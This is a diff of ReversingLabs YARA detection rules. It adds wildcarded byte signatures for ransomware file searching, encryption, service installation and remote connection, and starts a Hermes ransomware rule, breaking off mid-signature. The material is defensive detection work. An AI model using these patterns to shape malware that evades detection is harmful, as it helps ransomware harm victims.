+            ?? BE ?? ?? ?? ?? 89 F0 83 C4 ?? 5B 5E 5F 5D C2 ?? ?? 89 CB C7 44 24 ?? ?? ?? ?? ??
+            8D 54 24 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 FF
+            15 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C7 BE ?? ??
+            ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ??
+            ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C2 89 44 24 ??
+            83 F8 ?? 74 ?? 8D 44 24 ?? 89 44 24 ?? 89 14 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C6 85
+            C0 75 ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 3C 24 FF 15 ?? ?? ?? ??
+            83 EC ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 85 F6 0F 84 ?? ?? ?? ?? 8B
+            84 24 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 8B 54 24 ?? 89 44 24 ?? 89 54 24 ?? 8B 43 ?? 89 04
+            24 E8 ?? ?? ?? ?? 89 44 24 ?? 8B 73 ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24
+            E8 ?? ?? ?? ?? 8D 04 B6 01 C0 89 44 24 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C5 C7 44 24 ??
+            ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89
+            44 24 ?? 89 3C 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24
+            ?? 8B 54 24 ?? 8B 0D ?? ?? ?? ?? 89 4C 24 ?? 89 7C 24 ?? 89 C6 89 D7 89 5C 24 ?? E9
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? 89 5C 24 ?? 8B 44 24 ??
+            89 44 24 ?? 8B 4C 24 ?? 89 0C 24 FF 54 24 ?? 83 EC ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 89
+            5C 24 ?? 8B 44 24 ?? 89 44 24 ?? 89 2C 24 E8 ?? ?? ?? ?? 89 5C 24 ?? 89 5C 24 ?? C7
+            44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8D 44 24 ?? 89 44 24 ?? 89 6C 24 ?? C7
+            44 24 ?? ?? ?? ?? ?? 89 DA 31 F2 09 FA 0F 94 C0 0F B6 C0 89 44 24 ?? C7 44 24 ?? ??
+            ?? ?? ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C3 FF 15 ?? ?? ?? ?? 85
+            C0 78 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 89
+            6C 24 ?? 8B 4C 24 ?? 89 0C 24 FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? 2B 74 24 ?? 1B
+            7C 24 ?? 89 FA 09 F2 74 ?? 8B 44 24 ?? 8B 58 ?? B8 ?? ?? ?? ?? 39 F8 0F 82 ?? ?? ??
+            ?? 39 F3 0F 47 DE E9 ?? ?? ?? ?? 8B 7C 24 ?? 89 DE EB ?? 8B 7C 24 ?? BE ?? ?? ?? ??
+            85 ED 74 ?? 89 2C 24 E8 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 89 04 24 E8
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 7C 24 ?? BE ?? ?? ?? ?? EB
+        }
+		$encrypt_files_4 = {
+            FF 15 ?? ?? ?? ?? 83 EC ?? 89 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89
+            34 24 89 54 24 ?? 89 44 24 ?? 89 4C 24 ?? FF 95 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 29 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 19 95 ?? ?? ?? ?? 8B
+            8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 D0 89 CA 09 C2 0F 84 ?? ?? ?? ?? 31 D2 3B 95 ??
+            ?? ?? ?? 8B 43 ?? 89 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 72 ?? 77 ?? 8B 8D ?? ?? ?? ??
+            39 C8 76 ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 89 44 24 ?? 8D 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 54 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ??
+            83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 89 04 24 E8 ?? ?? ?? ?? 89 34 24 8B 35 ?? ?? ?? ?? FF D6 8B 85 ?? ?? ?? ?? 83 EC
+            ?? 89 04 24 FF D6 8B 85 ?? ?? ?? ?? 83 EC ?? 89 04 24 FF 15 ?? ?? ?? ?? 8B 8D ?? ??
+            ?? ?? 83 EC ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7
+            04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? C7 04 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 40 ?? 8B 88 ?? ?? ?? ?? 85 C9 74 ?? 8B 01 C7
+            04 24 ?? ?? ?? ?? FF 50 ?? 83 EC ?? 0F B7 C0 B9 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
+            83 EC ?? 89 C1 E8 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            89 04 24 FF 15
+        }
+		$search_files_3 = {
+            FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 75 ?? 8B 85
+            ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 FF D7 83
+            EC ?? 85 C0 0F 84 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? EB ?? 90 8D B4 26 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 83 C3 ?? 8B 50 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? 29 D0 C1 F8 ?? 69 C0 ??
+            ?? ?? ?? 39 C3 0F 83 ?? ?? ?? ?? 8D 04 5B 8D 34 C5 ?? ?? ?? ?? 8B 04 C2 89 44 24 ??
+            8B 85 ?? ?? ?? ?? 89 04 24 FF D7 83 EC ?? 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? 8B
+            1C 30 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? C7 04
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 5C
+            24 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 40 ?? 8B 88
+            ?? ?? ?? ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 01 C7 04 24 ?? ?? ?? ?? FF 50 ?? 83 EC ?? 0F
+            B7 C0 B9 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 89 C1 E8 ?? ?? ?? ?? 31 F6 E9
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8
+            ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 5C 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? E9 ?? ?? ?? ?? 90 8D 74 26 ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24
+            E8
+        }
+		$install_service = {
+            FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 89 C1 89 44 24 ?? 0F 84 ?? ?? ?? ?? 8B 84 24 ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 0C 24 89 44 24 ?? FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0
+            89 C3 0F 84 ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? 8D 6C 24 ?? 8D 7C 24 ?? C7 44 24 ??
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? 89 7C 24 ?? 89 44 24 ?? FF D0 83 EC
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 83 E0 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? A1 ?? ??
+            ?? ?? 89 44 24 ?? FF D0 8B 74 24 ?? 89 44 24 ?? 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? B8
+            ?? ?? ?? ?? F7 64 24 ?? B8 ?? ?? ?? ?? C1 EA ?? 81 FA ?? ?? ?? ?? 0F 47 D0 B8 ?? ??
+            ?? ?? 81 FA ?? ?? ?? ?? 0F 42 D0 89 14 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 6C 24 ?? C7
+            44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 FF 54 24 ?? 83 EC
+            ?? 85 C0 74 ?? 3B 74 24 ?? 8B 44 24 ?? 72 ?? FF D0 2B 44 24 ?? 3B 44 24 ?? 76 ?? 89
+            1C 24 8B 1D ?? ?? ?? ?? FF D3 83 EC ?? 8B 44 24 ?? 89 04 24 FF D3 83 EC ?? 83 C4 ??
+            5B 5E 5F 5D C2 ?? ?? 8D B4 26 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83
+            EC ?? 83 C4 ?? 5B 5E 5F 5D C2 ?? ?? 8D B6 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? 89 1C 24 FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? 89 6C 24 ?? C7 44
+            24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 FF 54 24 ?? 83 EC ??
+            85 C0 0F 84 ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? 8B 44 24 ?? FF D0 8B 74 24 ?? 89 44 24 ??
+            83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? F7 64 24 ?? B8 ?? ?? ?? ?? C1 EA ??
+            81 FA ?? ?? ?? ?? 0F 47 D0 B8 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 0F 42 D0 89 14 24 FF 15
+            ?? ?? ?? ?? 83 EC ?? 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ??
+            ?? ?? ?? 89 1C 24 FF 54 24 ?? 83 EC ?? 85 C0 0F 84 ?? ?? ?? ?? 3B 74 24 ?? 72 ?? 8B
+            44 24 ?? FF D0 2B 44 24 ?? 3B 44 24 ?? 76 ?? E9
+        }
+		$encrypt_files_5 = {
+            FF 15 ?? ?? ?? ?? 83 EC ?? 89 C7 BE ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 FF
+            15 ?? ?? ?? ?? 83 EC ?? 89 C2 89 44 24 ?? 83 F8 ?? 74 ?? 8D 44 24 ?? 89 44 24 ?? 89
+            14 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C6 85 C0 75 ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ??
+            ?? ?? 83 EC ?? 89 3C 24 FF 15 ?? ?? ?? ?? 83 EC ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ??
+            ?? ?? 83 EC ?? 85 F6 0F 84 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 8B 54 24
+            ?? 89 44 24 ?? 89 54 24 ?? 8B 43 ?? 89 04 24 E8 ?? ?? ?? ?? 89 44 24 ?? 8B 73 ?? 89
+            74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 04 B6 01 C0 89 44 24 ??
+            89 04 24 E8 ?? ?? ?? ?? 89 C5 C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? C7 44
+            24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 89 3C 24 FF 15 ?? ?? ?? ?? 83 EC
+            ?? 89 C6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 8B 54 24 ?? 8B 0D ?? ?? ?? ?? 89 4C 24
+            ?? 89 7C 24 ?? 89 C6 89 D7 89 5C 24 ?? E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44
+            24 ?? 89 44 24 ?? 89 5C 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 0C 24 FF 54 24
+            ?? 83 EC ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 89 5C 24 ?? 8B 44 24 ?? 89 44 24 ?? 89 2C 24
+            E8 ?? ?? ?? ?? 89 5C 24 ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 89 44 24
+            ?? 8D 44 24 ?? 89 44 24 ?? 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 DA 31 F2 09 FA 0F
+            94 C0 0F B6 C0 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ??
+            ?? ?? 83 EC ?? 89 C3 FF 15 ?? ?? ?? ?? 85 C0 78 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24
+            ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 89 6C 24 ?? 8B 4C 24 ?? 89 0C 24 FF 15
+        }
+		$search_files_4 = {
+            FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 89 C3 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 50 ?? 81 C2 ?? ?? ?? ?? 8B 42 ??
+            83 E0 ?? 83 C8 ?? 89 42 ?? 89 1C 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 89 C3 8B
+            00 89 DA 03 50 ?? 8B 42 ?? 83 E0 ?? 83 C8 ?? 89 42 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ??
+            ?? ?? 89 C1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ??
+            ?? 83 EC ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 83 BB ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ??
+            89 04 24 89 D9 E8 ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89
+            04 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 89 C1 E8 ?? ??
+            ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 B9 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 3B BD ??
+            ?? ?? ?? 75 ?? EB ?? 83 EC ?? 83 C7 ?? 39 BD ?? ?? ?? ?? 74 ?? 8B 45 ?? 89 44 24 ??
+            89 3C 24 89 D9 E8 ?? ?? ?? ?? EB ?? BE ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ??
+            ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95
+            ?? ?? ?? ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 89 F0 8D 65 ?? 5B 5E 5F 5D C2
+        }
+		$remote_connection_3 = {
+            55 89 E5 57 56 53 83 EC ?? 89 4D ?? 8B 5D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 45 ?? 89 44 24 ?? C7 04 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 8B 03 89 45 ?? EB ?? 83 EC ?? 89 45 ?? 85 C0 74 ?? 3D ?? ??
+            ?? ?? 74 ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 8D 45 ?? 89
+            44 24 ?? 8D 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? C7 44 24
+            ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 45 ?? 83 7D ?? ??
+            74 ?? BE ?? ?? ?? ?? 8D 7D ?? EB ?? 83 EC ?? 8D 45 ?? 89 04 24 8D 4D ?? E8 ?? ?? ??
+            ?? 83 EC ?? 8B 45 ?? 39 F8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C6 ?? 39 75 ?? 72 ?? 8B
+            45 ?? 8B 5C B0 ?? 89 7D ?? B8 ?? ?? ?? ?? 85 DB 74 ?? 89 1C 24 E8 ?? ?? ?? ?? 8D 04
+            43 C6 44 24 ?? ?? 89 44 24 ?? 89 1C 24 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 04
+            24 E8 ?? ?? ?? ?? 83 EC ?? E9 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? C1 F8 ?? 69 C0 ?? ?? ??
+            ?? 85 C0 74 ?? 8B 7D ?? 8D 9F ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 47 ?? 3B 47 ??
+            74 ?? 85 C0 74 ?? 8B 55 ?? 89 10 8D 48 ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ??
+            8B 45 ?? 83 40 ?? ?? 89 1C 24 E8 ?? ?? ?? ?? EB ?? 8B 4D ?? 83 C1 ?? 8D 45 ?? 89 04
+            24 E8 ?? ?? ?? ?? 83 EC ?? EB ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C2 ??
+            ?? 89 C3 8B 45 ?? 8D 55 ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? 89 1C 24 E8 ?? ?? ?? ?? 89 C3 EB ?? 53 83 EC ?? 8B 5C 24 ?? 8D 43 ?? 89 04 24 8B
+            0B E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? C7 04 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 83 C4 ?? 5B C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BlueMarble GmbH" and ( pe.signatures [ i ] . serial == "00:86:e5:a9:b9:e8:9e:50:75:c4:75:00:6d:0c:a0:38:32" or pe.signatures [ i ] . serial == "86:e5:a9:b9:e8:9e:50:75:c4:75:00:6d:0c:a0:38:32" ) and 1574791194 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $search_files and $encrypt_files and $remote_connection ) or ( $encrypt_files_2 and $remote_connection and $search_files ) or ( $search_files_2 and $encrypt_files_3 and $remote_connection_2 ) or ( $install_service and $search_files_3 and $encrypt_files_4 ) or ( $search_files_4 and $encrypt_files_5 and $remote_connection_3 ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_075Dca9Ca84B93E8A89B775128F90302 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Hermes : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Hermes ransomware."
 		author = "ReversingLabs"
-		id = "2fa6b400-7c6c-5bc4-9cac-78d52003a24e"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "1f1f363a-5be0-59e5-b1c1-5e277922790c"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3716-L3732"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "32af21e71fb3475c50de4cd8a24fa0aec1ee67bc01c1a3720c12f9ce822833c3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Hermes.yara#L1-L284"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6db95c422ee2f9dd8a1795031ee8d7d5ed84e16cde47512becc006b6a849e890"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Hermes"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$hermes_find_files_v1_p1 = {
+            A5 A5 A5 8D BD ?? ?? ?? ?? 66 AB BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? A5 A5 66 A5 68 ??
+            ?? ?? ?? 8D BD ?? ?? ?? ?? 50 AB 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 65
+            ?? ?? 8B 5D ?? 8B FB 4F 4F 8D 47 ?? 66 8B 4F ?? 47 47 66 85 C9 75 ?? BE ?? ?? ?? ??
+            A5 A5 8D 8D ?? ?? ?? ?? 51 50 66 A5 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 89 45 ?? E8
+            ?? ?? ?? ?? 59 59 8B C8 E8 ?? ?? ?? ?? 8B CB 8B D0 E8 ?? ?? ?? ?? 2B C2 33 C9 83 7D
+            ?? ?? 66 89 0C 43 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ??
+            8B C1 6A ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15
+            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ??
+            8B C1 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 FF 75
+            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 7D ?? A5 A5 A5 A5 33
+        }
+		$hermes_find_files_v1_p2 = {
+            C0 6A ?? 59 6A ?? 8D 7D ?? 66 AB BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 59 BE ?? ??
+            ?? ?? 8D BD ?? ?? ?? ?? F3 A5 BE ?? ?? ?? ?? 8D 7D ?? A5 A5 A5 A5 6A ?? 59 8D 7D ??
+            AB BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 8D BD ?? ?? ?? ?? AB AB 66 AB BE ?? ?? ??
+            ?? 8D 7D ?? A5 A5 A5 A5 33 C0 6A ?? 8D 7D ?? AB 59 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ??
+            F3 A5 66 A5 8D BD ?? ?? ?? ?? AB BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? A5 A5 A5 A5 8D BD
+            ?? ?? ?? ?? AB AB AB 66 AB 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85
+            C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59
+            85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59
+            59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D
+            85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50
+            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 0F
+        }
+		$hermes_find_files_v1_p3 = {
+            84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8
